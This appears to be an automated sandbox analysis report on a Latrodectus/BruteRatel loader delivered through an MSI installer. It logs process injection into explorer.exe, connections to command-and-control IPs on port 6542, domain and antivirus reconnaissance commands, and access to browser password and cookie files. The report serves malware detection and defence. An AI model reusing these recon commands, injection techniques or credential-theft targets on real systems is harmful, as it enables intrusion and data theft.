Process created: C:\Windows\Installer\MSI17D3.tmp "C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain

Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00CD33A8
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD353F SetUnhandledExceptionFilter,	3_2_00CD353F
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00CD2968
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: 3_2_00CD6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00CD6E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE2F0D8 SetUnhandledExceptionFilter,	5_2_000001E51AE2F0D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000001E51AE17608 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_000001E51AE17608
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6B1DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0E6B1DA0
Source: C:\Windows\explorer.exe	Code function: 9_2_0E6C53A8 SetUnhandledExceptionFilter,	9_2_0E6C53A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 94.232.43.224 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 3110000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe

Code function: 5_3_00007DF4D5F10100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

5_3_00007DF4D5F10100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 3110000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 3110000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 3110000 value: 4D

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7192 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 3110000

Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CB52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

3_2_00CB52F0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: explorer.exe, 00000009.00000002.4147116004.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4143132616.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4140702532.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1920734447.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000000.1921053147.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.4141313662.00000000018A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CD35A9 cpuid

3_2_00CD35A9

Source: C:\Windows\Installer\MSI17D3.tmp	Code function: EnumSystemLocalesW,	3_2_00CEE0C6
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: EnumSystemLocalesW,	3_2_00CEE1AC
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: EnumSystemLocalesW,	3_2_00CEE111
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: EnumSystemLocalesW,	3_2_00CE7132
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00CEE237
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoEx,	3_2_00CD23F8
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoW,	3_2_00CEE48A
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00CEE5B3
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoW,	3_2_00CE76AF
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetLocaleInfoW,	3_2_00CEE6B9
Source: C:\Windows\Installer\MSI17D3.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00CEE788
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW,	5_2_000001E51AE19CDC
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,	5_2_000001E51AE27140
Source: C:\Windows\System32\rundll32.exe	Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,	5_2_000001E51AE0E0FC
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,	5_2_000001E51AE2708C
Source: C:\Windows\System32\rundll32.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	5_2_000001E51AE24E7C
Source: C:\Windows\System32\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	5_2_000001E51AE26384
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,	5_2_000001E51AE27244
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free,	5_2_000001E51AE26218
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	5_2_000001E51AE2F160
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,	5_2_000001E51AE27934
Source: C:\Windows\System32\rundll32.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	5_2_000001E51AE24910
Source: C:\Windows\System32\rundll32.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	5_2_000001E51AE255E0
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,EnumSystemLocalesW,	5_2_000001E51AE275BC
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,	5_2_000001E51AE27704
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,EnumSystemLocalesW,	5_2_000001E51AE27670
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_000001E51AE19C1C
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,	5_2_000001E51AE26C20
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,	5_2_000001E51AE27BD8
Source: C:\Windows\System32\rundll32.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	5_2_000001E51AE12BC4
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,	5_2_000001E51AE1FD38
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,	5_2_000001E51AE1CCD0
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,GetLocaleInfoW,	5_2_000001E51AE27B30
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_000001E51AE27A80
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,	5_2_000001E5190CF5E0
Source: C:\Windows\System32\rundll32.exe	Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,	5_2_000001E5190D6934
Source: C:\Windows\System32\rundll32.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,	5_2_000001E5190D6AEC
Source: C:\Windows\System32\rundll32.exe	Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx,	5_2_000001E5190BD9A4

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CD37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00CD37D5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000001E51E964D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_000001E51E964D00

Source: C:\Windows\Installer\MSI17D3.tmp

Code function: 3_2_00CE7B1F GetTimeZoneInformation,

3_2_00CE7B1F

Source: C:\Windows\explorer.exe

Code function: 9_2_0311891C RtlGetVersion,GetVersionExW,

9_2_0311891C

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: WMIC.exe, 00000022.00000003.3189009496.000001DB51775000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: edReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3187698400.000001DB51762000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189482463.000001DB5176C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187769191.000001DB51F71000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3189053647.000001DB5176A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189500617.000001DB51771000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3189029474.000001DB51764000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3188980281.000001DB5176F000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3189139165.0000002B36A97000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3189586670.000001DB51ABB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3188407652.000001DB51F51000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3188384094.000001DB51F50000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3189419782.000001DB5174B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187698400.000001DB5174A000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3187634548.000001DB51723000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\net.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\net.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7192, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

9_2_0E628848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7192, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	141 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	1 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 Credentials In Files	11 Peripheral Device Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	2 Obfuscated Files or Information	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
